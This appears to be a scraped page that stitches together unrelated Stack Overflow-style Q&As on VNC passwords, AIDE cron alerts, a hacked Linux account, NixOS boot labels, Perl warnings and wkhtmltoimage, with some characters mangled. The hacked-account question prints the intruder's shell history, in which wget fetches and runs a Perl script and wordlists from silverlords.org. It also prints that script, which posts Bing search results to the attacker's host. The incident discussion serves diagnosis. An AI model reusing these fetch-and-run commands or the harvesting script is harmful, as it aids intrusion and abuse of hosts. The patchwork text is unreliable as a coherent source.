Hi need to generate a vnc password using any script (php preferably but any perl will do).
Problem is that 'vncpasswd' needs interactive user action (prompting for password and password verification).
Is there a way to generate it without prompting ?
From here.
#!/bin/perl
use Crypt::CBC;
my $key = pack("C8", 23, 82, 107, 6, 35, 78, 88, 7);
$cipher = Crypt::CBC->new({
'key'=>$key, 'cipher'=>'DES', 'prepend_iv'=>0, 'regenerate_key'=>0
});
$ciphertext = $cipher->encrypt("This data is hush hush");
$plaintext = $cipher->decrypt($ciphertext);
print "Encrypted: $ciphertext\n";
print "Decrypted: $plaintext\n";
Yes it's possible, folder /.vnc must exist and file rights have usually to be set.
So just do this:
mkdir $HOME/.vnc/
vncpasswd -f > $HOME/.vnc/passwd <<EOF
123456
123456
EOF
chmod 600 $HOME/.vnc/passwd
Related
I set up a crontab. I've installed AIDE and I have an AIDE database to check for file integrity.
How do I get cron to email me ONLY when files have been modified?
The script:
#!/bin/bash
if aide -c /etc/aide/aide.conf --check
then echo "AIDE detected no changes"
else
echo "Alert!: AIDE detected changes!"
The crontab:
* */12 * * * /root/script.sh | mail root#localhost.com
Use the MAILTO crontab variable rather then piping to mail. Then change your script so that it doesn't output anything unless there is a problem:
#!/bin/bash
aide -c /etc/aide/aide.conf --check || echo "Alert!: AIDE detected changes!"
The crontab:
MAILTO=root#localhost.com
* */12 * * * /root/script.sh
MAILTO=""
Notes:
You can use a simple (local) username instead; e.g. root.
You need to have set up mail handling on your system; e.g. delivery to local mailboxes or relaying via an external SMTP serice provider such as Gmail. That is beyond the scope of this Q&A.
The MAILTO="" is to stop following cron rules from sending mails. If you want them to do that, leave it out. It must be MAILTO="" not MAILTO=. (Cron is not implementing shell syntax here. Another clue is that the you can put spaces around the = which you can't do with shell syntax.)
Setting of variables in crontab is not part of the POSIX spec. There have been many implementations of cron over the years and not all of them support variable setting. Check what man 5 crontab says on your system.
Alternatively, you could use ... | mailx -E root#localhost.com rather than ... | mail root#localhost.com. This will skip sending the mail if the body (i.e. stdin) is empty.
How do I get cron to email me ONLY when files have been modified?
If you are on Linux with a local file system (e.g. ext4(5) or BTRFS), consider using inotify(7) facilities and then install incrond (on Debian or Ubuntu: the incron package) and use incrontab(5).
Be aware that incron and inotify don't work on remote file systems such as NFS or SMB/CIFS or on pseudofile systems like proc(5).
If you cannot use incron you'll need to use find(1) and perhaps stat(1) in your shell script periodically called by cron
BTW, some files (e.g. those under /var/run/, see hier(7) for more) are very often modified. And so are the data files handled by RDBMS such as PostGreSQL
Regarding AIDE, be sure to read its documentation. Since it is open source and even free software, consider studying then improving its code (e.g. to use inotify).
We wrote a Perl script that sends out an email if something went wrong and updates the database so that this email won't go out again.
#!/usr/bin/perl
my $aide = "/usr/sbin/aide -c /etc/aide.conf";
my $email = "security\#your-domain.com";
my $timestamp = `/bin/date +\%Y-\%m-\%d.\%H-\%M`;
my $output = "";
my $added = -1;
my $removed = -1;
my $changed = -1;
my $warning = 0;
my $found_no_differences = 0;
open(AIDE, "$aide --check|");
while (my $line=<AIDE>) {
chomp($line);
$output = $output.$line."\n";
if ($line =~ /Added entries\:\s*(\w+)/) { $added = $1; }
if ($line =~ /Removed entries\:\s*(\w+)/) { $removed = $1; }
if ($line =~ /Changed entries\:\s*(\w+)/) { $changed = $1; }
if ($line =~ /WARNING\:/) { $warning = $warning + 1; }
if ($line =~ /AIDE found NO differences/) { $found_no_differences = 1; }
}
close(AIDE);
if ($found_no_differences > 0) { exit(0); }
if ($added > 0 || $removed > 0 || $changed > 0 || $warning > 0 || $added == -1 || $changed == -1) {
open MAIL, "|mail -s 'AIDE $timestamp' $email";
print MAIL $output;
close MAIL;
system("$aide --init");
system("mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz");
}
by default aide sends email to local root user, it's probably best to create an alias for the local root user to noc#domain.com or whatever you use for your incoming email address, this way you not only get aide emails but also other system mail that's destined for the user root
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 5 years ago.
Improve this question
There was an account named "user" that would be used for these logins, which would be from all over the world. I spent several hours yesterday securing the computer and there have been no logins since that time. I awked the /var/log/auth.log into a list of ips ordered from oldest to most recent login, if that somehow helps:
185.145.252.26
185.145.252.36
109.236.83.3
104.167.2.4
217.23.13.125
185.38.148.238
194.88.106.146
43.225.107.70
194.88.107.163
192.162.101.217
62.112.11.88
194.63.141.141
194.88.107.162
74.222.19.247
194.88.107.164
178.137.184.237
167.114.210.108
5.196.76.41
118.70.72.25
109.236.91.85
62.112.11.222
91.195.103.172
62.112.11.94
62.112.11.90
188.27.75.73
194.88.106.197
194.88.107.165
38.84.132.236
91.197.235.11
62.112.11.79
62.112.11.223
144.76.112.21
185.8.7.144
91.230.47.91
91.230.47.92
91.195.103.189
91.230.47.89
91.230.47.90
109.236.89.72
195.228.11.82
109.236.92.184
46.175.121.38
94.177.190.188
171.251.76.179
173.212.230.79
144.217.75.30
5.141.202.235
31.207.47.36
62.112.11.86
217.23.2.183
217.23.1.87
154.122.98.44
41.47.42.128
41.242.137.33
171.232.175.131
41.114.123.190
1.54.115.72
108.170.8.185
86.121.85.122
91.197.232.103
160.0.224.69
217.23.2.77
212.83.171.102
41.145.17.243
62.112.11.81
82.79.252.36
41.114.63.134
5.56.133.126
109.120.131.106
76.68.108.151
113.20.108.27
46.246.61.20
146.185.28.52
45.32.219.199
One of the first things I did after changing the password of the "user" account was running history, which gave me this result:
1 sudo
2 sudo
3 sudo service vsftpd stop
4 su clay
5 unset PROMPT_COMMAND
6 PS1='[PEXPECT]\$'
7 wget http://xpl.silverlords.org/bing -O bing
8 wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9 wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10 uname
11 n
12 uname
13 history
I then ran cat /home/user/.bash_history for more but what I already had was all that was in the file.
In "user"'s home folder, I found four files, bing, output.13.19.27.txt , output.16.10.38.txt, and word. All were empty except bing, which was a perl script:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
use LWP::Simple;
use POSIX qw(strftime);
my $data = strftime "%H.%M.%S", gmtime;
my $ARGC = #ARGV;
if ($ARGC !=1) {
printf "$0 arquivo.txt\n";
printf "Coded by: Al3xG0 x#~\n";
exit(1);
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filename\n";
my $max_results = 2;
open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;
while (<IFH>) {
next if /^ *$/;
my $search_word = $_;
$search_word =~ s/\n//;
print "Results for -$search_word-\n";
for (my $i = 0; $i < $max_results; $i += 10) {
my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30); $b->env_proxy;
my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
my $check = index($c, 'sb_pagN');
if ($check == -1) { last; }
while (1) {
my $n = index($c, '<h2><a href="');
if ($n == -1) { last; }
$c = substr($c, $n + 13);
my $s = substr($c, 0, index($c, '"'));
my $save = undef;
if ($s =~ /http:\/\/([^\/]+)\//g) { $save = $s; }
print "$save\n";
#if ($save !~ /^ *$/) { print OFH "$save\n"; print "$save\n"};
getprint("http://post.silverlords.org/sites.php?site=$save");
}
}
print "\n";
}
close (IFH);
close (OFH);
I don't know perl, and after spending so much time with sshd config, blacklists, etc., I don't really have the time or energy to learn. If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.
Thanks so much,
Clay
EDIT: I found this article that could explain the purpose of the bing search script: https://www.wired.com/2013/02/microsoft-bing-fights-botnets/
It reads the file passed on the command line, and uses each line as a phrase to do a Bing search. It prints the URL of every search result returned by Bing, and also sends it to http://post.silverlords.org/sites.php?site=$save where $saveis the URL
It used to write the same URLs to the output.HH.MM.SS.txt files, but that line has been commented out so the files are created but left empty
So it's just a command-line bing search; nothing too sinister. Essentially nothing that they couldn't run on any machine that has access to bing
This is not an answer but merely an overlong comment about the observations I made.
When I issue the wget ... -O word commands, it works for me and I receive two files full of words. Looks like a list of random words, maybe passwords for a brute-force attack:
first file: (excerpt)
kalcio
kalciolaria
kalciolariaconia2
kalciov
kalcistn
kalcit
kalcit
kalcita
...
second file: (excerpt)
curious2s
curious2saab95
curious2:saab95
curious2see
curious2see
curious2squeak2
curious2swingineverton
Curious2tender
curious2tryany2asdfg
CURIOUS2TRYIT
curious2trythre092703
...
The Perl script bing is written by someone who's not familiar with Perl. He uses beginner's style from bad tutorials and/or obviously doesn't know the language very well.
Because he issued su clay he might know that such a user (presumably your user) even exists on that machine, without examining /etc/passwd or similar.
As #borodin and #melpomene say, the script searches bing for these words and then parses the resulting bing-page for URLs and then submits them to post.silverlords.org.
As the script currently is, it only abuses your computer's CPU and network to get its work done. The "work" is to massively submit Bing searches for all the words and collect the results at post.silverlords.org.
When I boot my machine it shows all generations in a list, but naming them "Generation 49", "Generation 50", etc.
Is there a way to add labels to generations, so that I can easily see later what was changed? I'd like to have something like an optional commit message, so it could be like "Generation 49 - switched to KDE5", "Generation 50 - switched back to gnome3".
/boot/grub/grub.conf is currently built from:
nixos/modules/system/boot/loader/grub/install-grub.pl
# Emit submenus for all system profiles.
sub addProfile {
my ($profile, $description) = #_;
# Add entries for all generations of this profile.
$conf .= "submenu \"$description\" {\n" if $grubVersion == 2;
sub nrFromGen { my ($x) = #_; $x =~ /\/\w+-(\d+)-link/; return $1; }
my #links = sort
{ nrFromGen($b) <=> nrFromGen($a) }
(glob "$profile-*-link");
my $curEntry = 0;
foreach my $link (#links) {
last if $curEntry++ >= $configurationLimit;
my $date = strftime("%F", localtime(lstat($link)->mtime));
my $version =
-e "$link/nixos-version"
? readFile("$link/nixos-version")
: basename((glob(dirname(Cwd::abs_path("$link/kernel")) . "/lib/modules/*"))[0]);
addEntry("NixOS - Configuration " . nrFromGen($link) . " ($date - $version)", $link);
}
$conf .= "}\n" if $grubVersion == 2;
}
this is a single entry in grub.conf:
menuentry "NixOS - Configuration 38 (2016-01-29 - 16.03pre75806.77f8f35)" {
search --set=drive1 --fs-uuid d931bd85-8f35-4ae9-a36b-c1ac51ad7b57
linux ($drive1)//kernels/56fkcbxnwzi0kh6vg677a4cd4zcabm55-linux-4.1.15-bzImage systemConfig=/nix/store/2sybsl278s5a8kzhplwcz5jbhbsqwdci-nixos-system-lenovo-t530-16.03pre75806.77f8f35 init=/nix/store/2sybsl278s5a8kzhplwcz5jbhbsqwdci-nixos-system-lenovo-t530-16.03pre75806.77f8f35/init loglevel=4
initrd ($drive1)//kernels/r33fajk0kaxlfmg922c2hy4rak5cj90z-initrd-initrd
}
however, nixos-rebuild supports --profile-name, quoting the manpage:
--profile-name, -p
Instead of using the Nix profile /nix/var/nix/profiles/system to keep track of
the current and previous system configurations, use
/nix/var/nix/profiles/system-profiles/name. When you use GRUB 2, for every
system profile created with this flag, NixOS will create a submenu named “NixOS
- Profile 'name'” in GRUB’s boot menu, containing the current and previous
configurations of this profile.
For instance, if you want to test a configuration file named test.nix without
affecting the default system profile, you would do:
$ nixos-rebuild switch -p test -I nixos-config=./test.nix
The new configuration will appear in the GRUB 2 submenu “NixOS - Profile
'test'”.
summary: hope this is what you are looking for.
NIXOS_LABEL="changed-some-settings" nixos-rebuild switch
system.nixos.label
You can set it either in your config, or in the environment (using NIXOS_LABEL).
I have a perl script that works fine when I run it using perl filename, however when I use the command
perl -w logint > logintime.html
I get this error
Use of uninitialized value $days in multiplication (*) at logint line 5, <LAST> line 3.
It repeats this from line 3-47
This is the perl code
#!/usr/bin/perl
open LAST, "last |";
while (<LAST>) {
if (($name,$days,$hours,$mins) = /^(\w+).+\((?:(\d+)\+)?(\d+):(\d+)/) {
$TIMES{$name} += 1440 * $days + 60 * $hours + $mins;
}
}
foreach (sort keys %TIMES) {
print "$_ $TIMES{$_}\n";
}
This is how I'm attempting to output it.
#!/bin/bash
echo $HDR > ~/public_html/logintime.html
perl -w logint > logintime.html
echo $FTR >> ~/public_html/logintime.html
This is just a warning, it's not an error. You're seeing it when you run that command because '-w' is the warnings pragma.
You could also put it at the end of your shebang
#!/usr/bin/perl -w
Or 'use warnings;'. Anyway, the warning is just saying it doesn't have a value. It looks like you're reading the last log to see who last logged in, the output can be different depending on what OS you're on. I would confirm it's working as expected and getting the correct values.
It's also best practice to use 'use strict;'.
I am trying to use wkhtmltoimage to convert html and web pages to images using Perl module WKHTMLTOPDF. The script and code below works from the command line but does not work if I call the script from browser.
Update:
If I run the script from the shell as a root user, it runs without
error, if I switch to the domain user where the script is located,
I get that error, seems it is executable permissions for domain owner.
The error is:
error running '/usr/local/bin/wkhtmltoimage': '/usr/local/bin/wkhtmltoimage http://yahoo.com
/home/xxxx/public_html/pdfwebkit/output.png' died with signal 11, with coredump at
/usr/local/perl-5.18.1/lib/site_perl/5.18.1/MooseX/Role/Cmd.pm line 128.
MooseX::Role::Cmd::run(WKHTMLTOPDF=HASH(0x2714260), "http://yahoo.com",
"/home/xxxx/public_html/pdfwebkit/output.png") called at /usr/local/
perl-5.18.1/lib/site_perl/5.18.1/WKHTMLTOPDF.pm line 645 WKHTMLTOPDF::generate(WKHTMLT
OPDF=HASH(0x2714260)) called at htmltoimage.cgi line xxx main::convert_using_WKHTMLTOPDF_image("http://yahoo.com",
"/home/xxxx/public_html/pdfwebkit/output.png") called at htmltoimage.cgi line xx
The code I am using is:
#!/usr/bin/perl
#!C:\perl\bin\perl.exe
print "Content-type: text/html;charset=utf-8\n\n";
use File::Spec::Functions;
use File::Basename;
BEGIN {
$|=1;
use CGI::Carp qw(fatalsToBrowser set_message);
sub handle_errors {
#print "Content-type: text/html;charset=utf-8\n\n";
my $msg = shift;
print qq!<h1><font color="red">Software Error</font></h1>!;
print qq!<p>$msg</p>!;
}
set_message(\&handle_errors);
}
$|=1;
my ($Script, $Bin);
if ($ENV{SCRIPT_FILENAME}) {
($Script, $Bin) = fileparse($ENV{SCRIPT_FILENAME});
}
else {
($Script, $Bin) = fileparse(__FILE__);
}
use WKHTMLTOPDF;
my $outfile = catfile ($Bin, 'output.jpg');
print "Converting url to image file $outfile...<br>\n";
convert_using_WKHTMLTOPDF_image('http://yahoo.com', $outfile);
print "Finished...<br>\n";
exit;
sub convert_using_WKHTMLTOPDF_image {
my ($page, $output) = #_;
my $pdf = new WKHTMLTOPDF;
my $bin = '/usr/local/bin/wkhtmltoimage';
#my $bin = 'C:/Program Files/wkhtmltopdf/bin/wkhtmltoimage.exe';
$pdf->bin_name($bin);
$pdf->_input_file($page);
$pdf->_output_file($output);
#$pdf->grayscale(1);
$pdf->generate;
}
sub convert_html_to_image_direct {
my ($page, $output) = #_;
my $bin = '/usr/local/bin/wkhtmltoimage --quiet ';
my $out = `$bin $page $output`;
print "out: $out<br>\n";
return $out;
}
The code works on Windows from the browser normal.
I am having the same issue if I try to use wkhtmltopdf for converting html to pdf.
The way I installed the binary are from here:
https://gist.github.com/DaRamirezSoto/5489861
# wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-amd64.tar.bz2
# wget http://wkhtmltopdf.googlecode.com/files/wkhtmltopdf-0.11.0_rc1-static-amd64.tar.bz2
# tar xvjf wkhtmltoimage-0.11.0_rc1-static-amd64.tar.bz2
# tar xvjf wkhtmltopdf-0.11.0_rc1-static-amd64.tar.bz2
# chown root:root wkhtmltopdf-amd64
# chown root:root wkhtmltoimage-amd64
# mv wkhtmltopdf-amd64 /usr/bin/wkhtmltopdf
# mv wkhtmltoimage-amd64 /usr/bin/wkhtmltoimage
// dependencies
# yum install -y libXrender libXext openssl openssl-devel fontconfig
I tested (in IE 11/Win 8.1) using Centos 6 server, worked fine with a little change to the path to the folder where I wanted it to be saved in.
My output was
Converting url to image file /home/user/../bittertruth.jpg...
Finished...
which is just as expected by you....